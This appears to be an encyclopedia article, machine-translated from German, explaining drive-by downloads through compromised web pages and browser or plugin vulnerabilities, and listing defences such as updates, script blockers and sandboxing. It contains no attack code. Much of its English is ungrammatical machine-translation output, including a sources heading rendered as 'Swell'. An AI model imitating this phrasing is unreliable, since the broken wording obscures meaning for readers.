Drive-by-Download

A drive-by download means the unconscious (English Drive-by: in passing ) and unintentional Download (Download) by software on the computer of a user. Among other things, so that the unwanted downloading of malicious software called simply by calling a specially crafted web page for it. Here vulnerabilities of a browser exploit, because, by definition, is with HTML content or browser scripting languages ​​can not be accessed outside the browser environment.

Manipulation of web pages

In many cases, websites can be manipulated without the knowledge of the operators of the attackers targeted, such as by known vulnerabilities in popular Web applications are used. Then alone the mere invocation of such a website is enough even without any action on the part of the user to ensure that such automatically ( and silently ) downloads the malware on his computer.

Dissemination

IT security companies report that a large number of websites are infected by malicious software. This method take since 2007 constantly and have now supplanted email as the main distribution method for malware. Daily would add several thousand affected sites.

Technology

Today, Web pages often contain dynamic functions by client-side technologies such as JavaScript realized (also as part of AJAX ), Java, Adobe Flash. These techniques allow constant communication between browser and server, without requiring the user to perform an action. This is used, among other things, to exchange banners to load lists, or to transfer data to the server. Typically, these actions are executed in the browser in a sandbox. Only if the browser has a vulnerability, software from this sandbox can access directly to the user's computer. Thus, it is possible that malicious software without user action from the server to the browser and on the vulnerability in the browser reaches the user's computer.

Protection

To protect against accidental drive- by downloads, it helps to always use the current version of the browser to always keep plugins like Adobe Flash and Adobe Reader to date or deactivate. In some cases, especially in a commercial environment, these scripting languages ​​can be switched off or filtered at the level of IT administration. Also disable, not to first install or at least maintaining current Java plug-in reduces the likelihood of infection considerably.

Another measure is to browser plug -ins that allow scripts only after approval by the user, such as NoScript or Flashblock for Firefox. Google Chrome and Opera users can access the browser plug- in NotScript.

Another option is to let the browser or e -mail program running in a sandbox. A sandbox is a defined memory area in which the entire output of the current in the sandbox program is written. To copy it to other parts, it requires a special action by the user so that unwanted changes are unlikely.

Has a similar effect to run programs under a different user account, such as "guest", run whose access rights are limited to a narrow range. This can be "run as ... " from the context menu under Windows or from the command line using the command " runas ... " reach. If an infection occurs, it is sufficient to delete the account and re-create.

Swell

  • Malware
Webbrowser Sandbox (computer security)
247432
de